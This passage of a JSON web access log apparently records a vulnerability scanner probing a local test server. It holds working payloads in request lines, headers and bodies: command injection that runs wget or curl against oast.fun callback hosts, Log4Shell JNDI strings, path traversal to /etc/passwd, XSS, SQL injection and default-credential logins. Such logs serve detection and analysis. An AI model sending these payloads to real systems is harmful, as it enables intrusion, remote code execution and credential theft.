+0000","request_body":"module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://c9v8h88smpv8c1ig07h0h9xpgcisw83wg.oast.fun&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /goform/setmac HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.219","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/index.htmlr", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /package-lock.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.build.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellcheckder.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc/groovyconsole.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?x=${jndi:ldap://${hostName}.uri.c9v8h88smpv8c1ig07h0iz176887zwe4a.oast.fun/a} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.224","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"key=';`wget http://c9v8h88smpv8c1ig07h01icpoy79hr6ms.oast.fun`;#","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.228","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.circleci/config.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.220","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /temp.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ucmdb-api/connect HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.225","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /client/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.jenkins.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data/autosuggest-remote.php?q=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ueditor/php/getRemoteImage.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"username=airflow&password=airflow&_csrf_token={{csrf_token}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.062","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/admin/airflow/login", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /old_phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"{\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22User.filter\x22,\x22id\x22: 1,\x22params\x22:{\x22query\x22:{\x22is_active\x22:true}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /json-rpc/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"username=dd' or extractvalue(0x0a,concat(0x0a,810663301*872821376))#&password=dd&submit=+%B5%C7+%C2%BC+\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?m=member&f=login_save HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.travis.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(297MTsoayyxfc2qobpDdqNVwzfR)) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.228","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cucm-uds/users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/data/autosuggest-remote.php?q=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dokuwiki/doku.php?id=wiki:welcome&at= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.msmtprc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.233","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /infos.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"{\x22name\x22:\x22\x22,\x22before\x22:\x22\x22,\x22after\x22:\x22\x22,\x22direction\x22:\x22desc\x22,\x22order_by\x22:\x22date\x22,\x22num_of_rows\x22:100}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ui/api/v1/global-search/builds?jfLoader=true HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.244","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /password.jsn HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"imgSrc=a","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.232","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"user_name=admin&user_password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/dologin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autoconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.071","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/production.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.080","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"1.242","http_user_agent":"${jndi:ldap://127.0.0.1#.${hostName}.useragent.c9v8h88smpv8c1ig07h0krejahfbbxr97.oast.fun}", "http_referer":"${jndi:ldap://127.0.0.1#.${hostName}.referer.c9v8h88smpv8c1ig07h0aajsych7pgfp1.oast.fun}", "request_method":"GET", "http_x_forwarded_for":"${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.c9v8h88smpv8c1ig07h0ywahba5o9piig.oast.fun}"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.241","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search?search_key=%7B%7B1337*1338%7D%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/admin/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.241","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"{\x22sheet\x22:[\x22.es(*)\x22],\x22time\x22:{\x22from\x22:\x22now-1m\x22,\x22to\x22:\x22now\x22,\x22mode\x22:\x22quick\x22,\x22interval\x22:\x22auto\x22,\x22timezone\x22:\x22Asia/Shanghai\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/timelion/run HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.248","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SecMail/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/autoconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /linusadmin-phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.075","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"{\x0D\x0A \x22headers\x22:{\x0D\x0A \x22X-Real-IP\x22:\x22127.0.0.1\x22,\x0D\x0A \x22Content-Type\x22:\x22application/json\x22\x0D\x0A },\x0D\x0A \x22timeout\x22:1500,\x0D\x0A \x22pipeline\x22:[\x0D\x0A {\x0D\x0A \x22method\x22:\x22PUT\x22,\x0D\x0A \x22path\x22:\x22/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1\x22,\x0D\x0A \x22body\x22:\x22{\x5Cr\x5Cn \x5C\x22name\x5C\x22: \x5C\x22test\x5C\x22, \x5C\x22method\x5C\x22: [\x5C\x22GET\x5C\x22],\x5Cr\x5Cn \x5C\x22uri\x5C\x22: \x5C\x22/api/297MTyjyoU9hpLwfgSXmorm1NeA\x5C\x22,\x5Cr\x5Cn \x5C\x22upstream\x5C\x22:{\x5C\x22type\x5C\x22:\x5C\x22roundrobin\x5C\x22,\x5C\x22nodes\x5C\x22:{\x5C\x22httpbin.org:80\x5C\x22:1}}\x5Cr\x5Cn,\x5Cr\x5Cn\x5C\x22filter_func\x5C\x22: \x5C\x22function(vars) os.execute('curl https://c9v8h88smpv8c1ig07h05ad3r3smnf9n4.oast.fun/`whoami`'); return true end\x5C\x22}\x22\x0D\x0A }\x0D\x0A ]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apisix/batch-requests HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.250","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /STATE_ID/123/agentLogUploader HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.247","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /carbon/admin/login_action.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.248","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/external/7.0/system.System.get_infos HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:54 